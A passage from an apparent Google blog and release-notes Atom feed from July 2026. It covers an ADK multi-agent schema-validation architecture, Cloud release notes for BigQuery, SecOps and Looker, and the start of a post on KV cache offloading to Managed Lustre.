    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Summit_Photo_1.max-600x600.format-webp.webp" /&gt;Google, the New York Jobs CEO Council and Urban Assembly hosted an AI summit for 150 education and industry leaders.</content>
    <link href="https://blog.google/products-and-platforms/products/education/nyc-ai-summit" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-01T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/developers-practitioners/beyond-static-prompts-with-google-adk</id>
    <title>Beyond Static Prompts: Building Scale-Proof, Polymorphic Multi-Agent Systems with Google's ADK</title>
    <updated>2026-07-01T14:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;As enterprise generative AI transitions from simple, conversational chatbots to autonomous multi-agent workflows, developers face a critical bottleneck: scale.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;In a production environment, an enterprise agent often needs to navigate hundreds of heterogeneous data structures, dynamic business rules, and shifting API schemas. The standard blueprint relies on "Static Prompting"—pre-loading all potential JSON schemas, Pydantic classes, or tool definitions directly into the agent’s system instructions.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;However, as your task complexity grows, this architecture breaks down. It leads to context window bloat, soaring token costs, and a sharp degradation in accuracy known as Attention Diffusion—where the model mistakenly mixes fields from dormant schemas into active requests.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To solve this issue, we need to decouple an agent's reasoning capabilities from its structural data requirements. This post introduces an architecture for &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Context-Aware Polymorphic Schema Validation&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, a design pattern that leverages a centralized metadata registry to dynamically inject context and enforce strict schema validation at runtime by using &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Google's Agent Development Kit (ADK)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemini Flash&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;The Pitfalls of Static Agent Architectures&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When managing structured inputs and outputs in high-cardinality enterprise environments, traditional LLM orchestration frameworks introduce severe operational friction:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Context Window Bloat &amp;amp; Latency Cascades&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Standard architectures require all potential data schemas to be pre-loaded into the agent's initial prompt instructions. This "Static Prompting" creates massive context bloat, which directly drives up token costs, induces unnecessary operational latency, and degrades the model's reasoning density by crowding the focus window with irrelevant metadata.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Attention Diffusion in High-Cardinality Spaces&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Large language models struggle to cleanly isolate highly similar data structures when contained within a single large prompt. In complex environments, agents frequently experience attention diffusion, mistakenly populating fields or enforcing validation rules from an inactive schema into an active production payload.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Synchronous Maintenance and Code Debt&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Traditional approaches treat the system prompt (inference) and the guardrail (validation) as two separate, disconnected code silos. Because these live in isolated codebases, any slight modification to a business requirement necessitates manual, parallel updates to both the prompt structure and the validator code, creating high operational friction.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Nondeterministic Multi-Agent Handoffs&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Multi-agent systems frequently lack a deterministic verification check before routing state. Sub-agents are often invoked without an automated mechanism verifying that the shared session state actually meets their specific structural prerequisites, resulting in "silent failures" where agents initialize with malformed context and have no autonomous recovery mechanism.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;The Architecture: Just-in-Time Polymorphic Orchestration&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Instead of expecting the LLM to hold every business rule in memory, this architecture treats schemas as externalized, discoverable metadata assets. The system splits the execution lifecycle into two clean phases: &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Context Discovery&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Dynamic Validation&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="8237vVmwKVioz8C_image-bytes" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/8237vVmwKVioz8C_image-bytes.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;1. Centralized Metadata Registry&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;All schemas are externalized out of the code and the prompt, and they're stored within a central registry (such as Cloud Storage) as high-density &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Schema Descriptor JSONs&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. Each descriptor contains the following:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Field Definitions&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Semantic names and natural language descriptions.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Mapping Rules&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Declarative logic that details how informal user inputs translate to downstream system parameters.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Polymorphic Validation Hooks&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: References to specific programmatic validation rules (like regex constraints and range boundaries) that are bound directly to the field metadata.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;2. The Dynamic Discovery &amp;amp; Validation Loop&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Instead of starting with a massive, 20,000-token prompt, the agent initializes with a lightweight, 200-token &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Discovery Prompt&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; utilizing Google's ADK. The following lifecycle sequence details the exact transaction loop as the system transitions from initial user discovery to metadata enforcement:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="525004649__78803667__1817707" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/525004649__78803667__1817707.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;The transaction loop shifts smoothly across four lifecycle phases to process input text:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Phase 1: Context Discovery (Steps 1–3)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: The orchestration agent kicks off with a minimal system prompt. It engages in a brief fallback loop with the user solely to distill their core intent (like identifying that the user requires a "Service Agreement") without holding any heavy schema constraints yet.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Phase 2: Metadata Resolution (Steps 4–6)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: After the intent is crystallized, the agent executes an automated tool call (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;load_descriptor&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) to fetch the isolated schema rules out of the Central Metadata Registry (Cloud Storage). Then the agent instantly overwrites the active session memory state with this highly specific metadata.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Phase 3: Metadata-Driven Assembly (Steps 7–14)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: The system enters an active evaluation loop. The agent evaluates data gaps, asks for a precise field (e.g., "Effective Date"), and then it pushes the user's raw conversational input directly to a separate &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;Polymorphic Validator&lt;/code&gt;&lt;strong style="vertical-align: baseline;"&gt;–&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;a validation tool that runs on Cloud Run.&lt;/span&gt;&lt;/span&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;If validation fails&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;: A deterministic error code loops directly back to the agent to trigger conversational self-correction.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;If validation passes&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;: The field is safely committed into the session's master JSON payload.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Phase 4: Finalization (Steps 15–16)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Only when the cumulative master payload matches the strict metadata criteria with 100% compliance does the orchestrator release the state. The release triggers the secure downstream enterprise API payloads or it executes a clean multi-agent handoff.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;Th&lt;span style="color: #000000;"&gt;e Design Pattern in Practice: Declarative Schema Factory&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Building this architecture on Google Cloud relies on a declarative configuration pattern, removing structural rules from your core prompt engineering layers entirely:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;// Example: Centralized Schema Descriptor JSON\r\n{\r\n  &amp;quot;domain&amp;quot;: &amp;quot;travel_expense&amp;quot;,\r\n  &amp;quot;fields&amp;quot;: {\r\n    &amp;quot;amount&amp;quot;: {\r\n      &amp;quot;type&amp;quot;: &amp;quot;float&amp;quot;,\r\n      &amp;quot;description&amp;quot;: &amp;quot;Total transaction amount in local currency&amp;quot;,\r\n      &amp;quot;validation_hook&amp;quot;: &amp;quot;check_positive_bounds&amp;quot;\r\n    },\r\n    &amp;quot;receipt_id&amp;quot;: {\r\n      &amp;quot;type&amp;quot;: &amp;quot;string&amp;quot;,\r\n      &amp;quot;description&amp;quot;: &amp;quot;Alphanumeric system ID found on the receipt image&amp;quot;,\r\n      &amp;quot;validation_hook&amp;quot;: &amp;quot;regex_match_expense_v2&amp;quot;\r\n    }\r\n  }\r\n}&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe6a3e24fa0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;Architectural Component Mapping&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Multi-Agent Coordination (Google's ADK)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Google's ADK manages the core multi-agent workflows, state transitions, and tool-calling infrastructure, which enables developers to programmatically intercept execution boundaries.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;High-Density Inference Engine (Gemini 3 Flash)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Gemini 3 Flash serves as the reasoning backbone. Its low latency, fast token processing speeds, and highly cost-effective execution costs make it the ideal model for running rapid, iterative context-switching loops without inflating token bills.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Externalized Storage Layer (Cloud Storage)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Cloud Storage houses the library of JSON descriptors. The storage layer enables system administrators or business analysts to modify validation bounds or onboard completely new business domains instantly by uploading a file—requiring zero code deployment or application downtime.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Polymorphic Validation Hooks (Cloud Run functions)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Isolated programmatic constraints live as decoupled serverless endpoints. When an asset field triggers a verification check, the orchestration middleware dynamically calls the targeted function mapped inside the registry descriptor.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;Business and Operational Impact&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Shifting from a static paradigm to a dynamic, decoupled schema architecture provides immediate advantages for enterprise production environments:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;100% Reasoning Density&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Because the agent's context window is never cluttered with irrelevant rules or alternate schemas, token consumption drops drastically, latency decreases, and hallucination rates fall to near zero.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Zero-Downtime Adaptability&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Need to support a new product variant, an updated database field, or a shifting compliance rule? Simply upload a new or revised JSON descriptor to your central registry. The multi-agent system will adapt to the new business rules on its very next turn without a single line of code being redeployed.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Deterministic State Enforcement&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: By binding your prompt instructions directly to programmatic validation rules via the registry, you eliminate the risk of silent multi-agent failures. Outbound context payloads are systematically checked and corrected &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;before&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; hitting expensive enterprise applications.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/beyond-static-prompts-with-google-adk" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-01T14:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://googlecloudpresscorner.com/2026-07-01-Google-Cloud-Summit-in-Africa-Highlights-the-Continents-Digital-Transformation-and-Unveils-New-Agentic-AI-and-Infrastructure-Investments</id>
    <title>Google Cloud Summit in Africa Highlights the Continent’s Digital Transformation and Unveils New Agentic AI and Infrastructure Investments</title>
    <updated>2026-07-01T12:00:00+00:00</updated>
    <link href="https://googlecloudpresscorner.com/2026-07-01-Google-Cloud-Summit-in-Africa-Highlights-the-Continents-Digital-Transformation-and-Unveils-New-Agentic-AI-and-Infrastructure-Investments" rel="alternate"/>
    <category term="Google Cloud Press"/>
    <published>2026-07-01T12:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#July_01_2026</id>
    <title>Cloud Release Notes — July 01, 2026</title>
    <updated>2026-07-01T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;BigQuery&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;You can now use pre-trained TimesFM models in BigQuery ML
directly from
&lt;a href="https://docs.cloud.google.com/bigquery/docs/connected-sheets"&gt;Connected Sheets&lt;/a&gt;.
These models let you create
forecasts and detect anomalies in your data by using the
&lt;a href="https://docs.cloud.google.com/bigquery/docs/reference/standard-sql/bigqueryml-syntax-ai-forecast"&gt;&lt;code&gt;AI.FORECAST&lt;/code&gt;&lt;/a&gt;
and
&lt;a href="https://docs.cloud.google.com/bigquery/docs/reference/standard-sql/bigqueryml-syntax-ai-detect-anomalies"&gt;&lt;code&gt;AI.DETECT_ANOMALIES&lt;/code&gt;&lt;/a&gt;
functions. This feature is
&lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;generally available&lt;/a&gt;
(GA).&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Gemini Enterprise Agent Platform&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;h3 id="provisioned_throughput_multiple_pending_new_orders_ga"&gt;Provisioned Throughput: Multiple pending new orders GA&lt;/h3&gt;
&lt;p&gt;The ability to submit multiple pending orders is generally available. you can
submit up to seven Google model orders for the same model and region.
See &lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/models/provisioned-throughput/purchase-provisioned-throughput#multiple"&gt;Multiple pending
orders&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google SecOps&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;[Spotlight Feature] Enhanced security and compliance for the Advanced BigQuery Export feature&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://docs.cloud.google.com/chronicle/docs/reports/bigquery-export"&gt;Advanced BigQuery Export feature&lt;/a&gt; is in Preview and is available for Google SecOps Enterprise Plus customers only. &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Here's what's new:&lt;/strong&gt; We're excited to announce significant performance and coverage enhancements to Advanced BigQuery Export for Google SecOps Enterprise Plus customers.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Expanded dataset support&lt;/strong&gt;: In addition to UDM events, rule detections, and IoC matches, we now support the export of Entity Graph and Ingestion Metrics.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Enhanced security &amp;amp; compliance&lt;/strong&gt;: The offering natively supports &lt;a href="https://docs.cloud.google.com/chronicle/docs/secops/vpcsc-for-secops"&gt;VPC Service Controls (VPC-SC)&lt;/a&gt;, &lt;a href="https://docs.cloud.google.com/chronicle/docs/secops/cmek_for_secops"&gt;Customer-Managed Encryption Keys (CMEK)&lt;/a&gt;, and Data Residency (DRZ). Furthermore, customer-facing audit logs (Access Transparency) are delivered directly to your Cloud Logging workspace using the Federated Resource Identification Service.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data integrity and deduplication&lt;/strong&gt;: The system now uses Fine-Grained DML merges to update records in place behind the scenes. This ensures that you receive clean, deduplicated data without needing to write complex SQL routines.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Seamless MSSP support (hub and spoke)&lt;/strong&gt;: Managed Security Service Providers (MSSPs) can now efficiently manage analytics across multiple customer tenants. This is achieved by programmatically subscribing to customers' linked datasets from a single centralized "Hub" project.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Enum mapping tables&lt;/strong&gt;: Advanced BigQuery Export now includes &lt;code&gt;entity_enum_value_to_name_mapping&lt;/code&gt; and &lt;code&gt;udm_enum_value_to_name_mapping&lt;/code&gt; tables. These allow you to easily join against your events to translate numerical enum values into human-readable strings.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Key reminders&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Public preview &amp;amp; feature activation&lt;/strong&gt;: This feature is currently in Public Preview, is enabled only upon request, and may require initial configuration in your organization's Google SecOps instance. Contact your Google SecOps representative to confirm feature enablement.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Enterprise Plus only&lt;/strong&gt;: This feature is exclusive to the Enterprise Plus tier.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Zero-maintenance&lt;/strong&gt;: Your security data remains in a Google-managed project, appearing as a read-only linked dataset directly in your own Google Cloud project. This lets you query the data locally without the overhead of managing the pipeline or paying for storage.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Migration and dual operation&lt;/strong&gt;: To support a smooth transition without disruption during the Public Preview, your data will be exported to the new BigQuery tenant project in addition to your existing Google-managed BigQuery project. You'll be notified before the old export pipeline is disabled for your account.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 class="release-note-product-title"&gt;Google SecOps Marketplace&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Proofpoint Email Protection&lt;/strong&gt;: Version 8.0&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;The following new actions have been added to support searching and 
programmatically managing quarantined emails:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Search Quarantined Emails&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Delete Quarantined Email&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Resubmit Quarantined Email&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Move Quarantined Email&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Proofpoint Email Protection&lt;/strong&gt;: Version 8.0&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Updated backend script implementation to support the new framework for the 
following actions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Enrich Entities&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Ping&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 class="release-note-product-title"&gt;Looker&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;The latest versions in the Looker (Google Cloud core) &lt;a href="https://docs.cloud.google.com/looker/docs/looker-core-release-process#release_channels"&gt;release channels&lt;/a&gt; are beginning deployment as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Latest version in the Rapid channel: &lt;strong&gt;26.10&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Latest version in the Regular channel: &lt;strong&gt;26.10&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Latest version in the No Channel channel: &lt;strong&gt;26.10&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Looker (Google Cloud core) has introduced &lt;a href="https://docs.cloud.google.com/looker/docs/looker-core-release-process#release_channels"&gt;release channels&lt;/a&gt; in preview, allowing users to choose between Rapid, Regular, and "No channel" options to manage the cadence of version updates. The Rapid channel provides early access to new capabilities but is excluded from the Service Level Agreement (SLA), while the Regular channel offers balanced stability with an optional Accelerated Security Patching flag.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#July_01_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-07-01T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/developers-practitioners/scaling-llm-inference-multi-node-kv-cache-offloading-with-gke-managed-lustre</id>
    <title>Scaling LLM Inference: Multi-Node KV Cache Offloading with GKE &amp; Managed Lustre</title>
    <updated>2026-07-01T07:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;em&gt;Significant contributors to this article include &lt;strong&gt;Sneha Aradhey&lt;/strong&gt;, Software Engineer, Google Kubernetes Engine, and &lt;strong&gt;Michael MacDonald&lt;/strong&gt;, Sr Software Engineer, Google Cloud Managed Lustre.&lt;/em&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Enterprise production environments are shifting to distributed, multi-node architectures to serve long-context window lengths and agentic AI. As these workloads scale, KVCaches often outgrow local CPU RAM and host SSD cache tiers.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To handle this, some setups attempt to pool node-local storage into a distributed layer (such as multi-node pooled NVMe arrays). Pooling SSDs aggregates raw capacity and often leverages spare local drives, presenting clear advantages. However, there are some limitations: the approach requires the compute cluster to manage its own complex data distribution and cross-node replication.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;An alternative is to offload the attention state to a dedicated, high-performance external parallel filesystem. We utilize &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Google Cloud Managed Lustre with the llm-d offloading stack&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; as a cluster-wide decentralized attention cache tier, bypassing host-level capacity limits and eliminating the networking overhead of managing local pooled drives.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With this approach, we achieve efficiency at scale:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Google Cloud Managed Lustre enables over 50% TCO savings and reduces GPU-hour requirements for Llama-3.3-70B inference on a six-node A3 Mega cluster by nearly 60%. These gains are realized by offloading shared, prefilled KV caches to Lustre’s high-performance tier with a 95% cache hit rate.&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;Benchmark Configuration&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Model:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Llama-3.3-70B&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Context Dynamics:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Prompt length of 50,000 tokens, input question length of 256 tokens, and output length of 512 tokens.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;Extension of Lustre KV Cache solution with CPU RAM offload&lt;/h4&gt;
